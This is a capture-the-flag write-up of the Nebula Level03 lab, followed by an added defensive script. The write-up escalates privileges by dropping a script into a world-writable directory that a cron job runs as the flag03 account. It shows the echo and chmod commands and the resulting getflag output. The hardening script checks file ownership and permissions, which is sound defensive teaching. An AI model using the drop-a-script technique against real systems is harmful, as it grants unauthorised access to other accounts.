I was surprised how easy this level was. According to Exploit Exercises, Nebula Level03:
"Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes."
Checking out writable.sh, we see
$ cat ../writable.sh
#!/bin/sh
for i in /home/flag03/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done
This script executes everything within the directory writable.d, then deletes it.
Let's create a script inside the writable.d directory for cron to execute for us.
$ echo -e '#!/bin/bash\n/bin/getflag > /tmp/output.txt' > file.sh
$ chmod 700 file.sh
Running the getflag command ourselves usually produces
$ getflag is executing on a non-flag account, this doesn't count
However, once cron executes our script, it creates a file output.txt with the output from the getflag command.
$ cat /tmp/output.txt
You have successfully executed getflag on a target account
There we go!
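As a defender's counterpart to writable.sh, the following added example (not from the original post or from Exploit Exercises) shows the ownership and mode checks that keep a cron-driven runner from executing files dropped by other accounts. The function names are hypothetical and GNU stat is assumed.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumes GNU stat (stat -c).

# owned_and_locked PATH UID
# Succeeds only if PATH is not a symlink, is owned by UID, and has neither
# the group-write (020) nor the other-write (002) permission bit set.
owned_and_locked() {
    [ -e "$1" ] && [ ! -L "$1" ] || return 1
    meta=$(stat -c '%u %a' -- "$1") || return 1
    owner=${meta% *}
    mode=${meta#* }
    [ "$owner" = "$2" ] || return 1
    [ $(( 0$mode & 022 )) -eq 0 ]
}

# run_drop_dir DIR UID
# Hardened counterpart of writable.sh: refuses a drop directory that other
# accounts can write to, and skips any file that fails the same check.
# Unlike writable.sh it does not delete the files it processes.
run_drop_dir() {
    dir=$1
    want_uid=$2
    if ! owned_and_locked "$dir" "$want_uid"; then
        echo "refusing $dir: wrong owner or writable by others" >&2
        return 1
    fi
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if owned_and_locked "$f" "$want_uid"; then
            (ulimit -t 5; sh "$f")
        else
            echo "skipping $f: wrong owner or writable by others" >&2
        fi
    done
    return 0
}

# Intended call from the cron job, running as the account that owns DIR:
#   run_drop_dir /path/to/drop.d "$(id -u)"
```

With these checks in place, a directory like writable.d that other users can write to is rejected outright instead of being treated as a job queue.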